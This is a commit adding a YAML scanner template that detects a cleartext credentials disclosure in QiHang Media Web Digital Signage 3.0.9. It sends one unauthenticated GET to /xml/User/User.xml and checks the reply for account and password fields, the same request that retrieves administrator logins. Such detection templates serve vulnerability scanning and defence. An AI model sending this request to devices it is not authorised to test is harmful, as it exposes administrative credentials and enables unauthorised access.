Create qihang-media-web-credentials-disclosure.yaml
The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>patch-1
parent
90138f44d1
commit
f750bf5ba5
|
@ -0,0 +1,22 @@
|
|||
id: qihang-media-web-credentials-disclosure
|
||||
|
||||
info:
|
||||
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
|
||||
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
|
||||
tags: qihang,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xml/User/User.xml"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "User id"
|
||||
- "account"
|
||||
- "password"
|
||||
condition: and
|
Loading…
Reference in New Issue